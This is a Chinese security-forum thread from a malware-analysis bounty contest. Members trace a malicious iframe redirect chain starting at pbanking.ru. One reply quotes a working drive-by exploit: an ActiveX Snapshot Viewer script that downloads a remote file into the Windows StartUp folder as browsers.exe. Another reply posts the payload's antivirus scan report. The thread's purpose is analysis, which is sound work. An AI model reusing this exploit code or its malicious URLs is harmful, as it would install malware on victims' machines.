楼主: qianwenxiang
收起左侧

[其它] [解密悬赏][第8期][结束]

[复制链接]
雨宫优子
发表于 2009-1-6 20:30:02 | 显示全部楼层
隐身娃都是去哪里搞来这些地址的
雨宫优子
发表于 2009-1-6 20:33:15 | 显示全部楼层
时间已到...
只能飘过....
像第二个这种XE物...我看很难悬赏得到人了
250662772
发表于 2009-1-6 20:33:47 | 显示全部楼层
网页分析结果如下(250662772).
[wide]http://www.pbanking.ru/
    [frame]http://winesamile.cn/template.html
        [frame]http://whitebiz.cn/euro/index.php
            [frame]http://whitebiz.cn/euro/pdf.php(也不知道是打开了,还是就是空白)

就解到这了,也不知道正不正确

评分

参与人数 1经验 +15 收起 理由
qianwenxiang + 15 加分鼓励(3步)

查看全部评分

雨宫优子
发表于 2009-1-6 20:35:15 | 显示全部楼层
原帖由 250662772 于 2009-1-6 20:33 发表
网页分析结果如下(250662772).
[wide]http://www.pbanking.ru/
    [frame]http://winesamile.cn/template.html
        [frame]http://whitebiz.cn/euro/index.php
            [frame]http://whitebiz.cn/euro ...

下面还有pdfexpl...

似乎你最后那个地址少了个?id=*****

好像没解完,不过可能能给点分

[ 本帖最后由 aarwwefdds 于 2009-1-6 20:37 编辑 ]
250662772
发表于 2009-1-6 20:36:51 | 显示全部楼层
原帖由 aarwwefdds 于 2009-1-6 20:35 发表

下面还有pdfexpl...

好像没解完,不过可能能给点分

hxxp://whitebiz.cn/euro/pdf.php打开是空白的,我换个IP打开试试
雨宫优子
发表于 2009-1-6 20:38:13 | 显示全部楼层
原帖由 250662772 于 2009-1-6 20:36 发表

hxxp://whitebiz.cn/euro/pdf.php打开是空白的,我换个IP打开试试

你最后那个地址似乎少了个?id=*****...
qianwenxiang
 楼主| 发表于 2009-1-6 20:44:16 | 显示全部楼层

回复 11楼 aarwwefdds 的帖子

Google
qianwenxiang
 楼主| 发表于 2009-1-6 20:44:54 | 显示全部楼层

回复 10楼 zzh161 的帖子

中国申奥的时候见到过一次..
250662772
发表于 2009-1-6 21:07:21 | 显示全部楼层
又重新解了一边
网页分析结果如下(250662772).
网页分析结果如下(250662772).
[unknown]www.pbanking.ru/
    [frame]http://winesamile.cn/template.html
        [frame]http://winesamile.cn/top10.html
            [frame]http://papampam.net/in.cgi?pipka3
        [frame]http://whitebiz.cn/euro/index.php
            [frame]http://whitebiz.cn/euro/pdf.php

hxxp://papampam.net/in.cgi?pipka3
<object classid="clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9" id="attack"></object>
<script>
var arbitrary_file = "http://portulote.com/cache/load.php";
var destination = 'c:/Documents and Settings/All Users/Start Menu/Programs/StartUp/browsers.exe';
attack.SnapshotPath = arbitrary_file;
attack.CompressedPath = destination;
attack.PrintSnapshot(arbitrary_file,destination);
</script>

<embed src="pdf.php" type="application/pdf" width=100 height=100></embed>

[ 本帖最后由 250662772 于 2009-1-6 21:09 编辑 ]

file.rar

7.58 KB, 下载次数: 248

评分

参与人数 1经验 +11 收起 理由
qianwenxiang + 11 加分鼓励

查看全部评分

250662772
发表于 2009-1-6 21:13:58 | 显示全部楼层
病毒够厉害,基本全过了

VirSCAN.org Scanned Report :
Scanned time   : 2009/01/06 21:10:16 (CST)
Scanner results: 8%的杀软(3/38)报告发现病毒
File Name      : file.exe
File Size      : 9715 byte
File Type      : PE32 executable for MS Windows (GUI) Intel 80386 32-bit
MD5            : c43f4ef4b1a322dec463b140d9bf7bda
SHA1           : 791af25a683554d975f111e173489205c63e988a
Online report  : http://virscan.org/report/abb9a4f7736fe9ecfe007a2cb38ff026.html

Scanner        Engine Ver      Sig Ver           Sig Date    Time   Scan result
a-squared      4.0.0.29        20090106203145    2009-01-06  2.36   -
安博士V3       2009.01.06.03   2009.01.06        2009-01-06  1.03   -
AntiVir        7.9.0.45        7.1.1.73          2009-01-05  1.72   TR/Crypt.XPACK.Gen
安天           2.0.18          20090105.1950502  2009-01-05  0.02   -
Authentium     5.1.1           200901051631      2009-01-05  1.10   -
AVAST!         3.0.1           090105-0          2009-01-05  0.77   -
AVG            7.5.52.442      270.10.3/1878     2009-01-06  1.85   -
BitDefender    7.81008.2409911 7.23004           2009-01-06  2.20   -
CA (VET)       9.0.0.143       31.6.6293         2009-01-06  5.84   -
ClamAV         0.94.2          8838              2009-01-06  0.01   -
Comodo         3.0             878               2009-01-05  1.25   -
CP Secure      1.1.0.715       2009.01.05        2009-01-05  6.31   -
Dr.Web         4.44.0.9170     2009.01.06        2009-01-06  3.80   -
ewido          4.0.0.2         2008.12.31        2008-12-31  4.30   -
F-Prot         4.4.4.56        20090105          2009-01-05  1.07   -
F-Secure       5.51.6100       2009.01.06.05     2009-01-06  4.12   -
飞塔           2.81-3.117      9.896             2009-01-05  0.17   -
GData          19.2291/19.174  20090106          2009-01-06  2.88   -
ViRobot        20090106        2009.01.06        2009-01-06  0.40   -
Ikarus         T3.1.01.45      2009.01.06.72108  2009-01-06  4.06   -
江民杀毒       11.0.706        2009.01.06        2009-01-06  1.43   -
卡巴斯基       5.5.10          2009.01.06        2009-01-06  0.04   -
金山毒霸       2008.9.8.18     2009.1.6.20       2009-01-06  0.58   -
迈克菲         5.3.00          5486              2009-01-05  2.84   -
Microsoft      1.4205          2009.01.06        2009-01-06  4.13   -
mks_vir        2.01            2009.01.06        2009-01-06  2.78   Heur.W32
Norman         5.93.01         5.93.00           2009-01-05  6.08   -
熊猫卫士       9.05.01         2009.01.06        2009-01-06  2.56   Suspicious file
趋势科技       8.700-1004      5.750.04          2009-01-06  0.02   -
Quick Heal     10.00           2009.01.06        2009-01-06  0.85   -
瑞星           20.0            21.11.12.00       2009-01-06  0.79   -
Sophos         2.82.1          4.37              2009-01-06  2.04   -
Sunbelt        4755            4755              2008-12-22  0.48   -
赛门铁克       1.3.0.24        20090105.009      2009-01-05  0.05   -
nProtect       20090106.01     2842139           2009-01-06  3.70   -
The Hacker     6.3.1.2         v00205            2009-01-04  0.52   -
VBA32          3.12.8.10       20090105.1110     2009-01-05  1.52   -
VirusBuster    4.5.11.10       10.100.16/757569  2009-01-05  0.96   -
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-17 08:46 , Processed in 0.090436 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表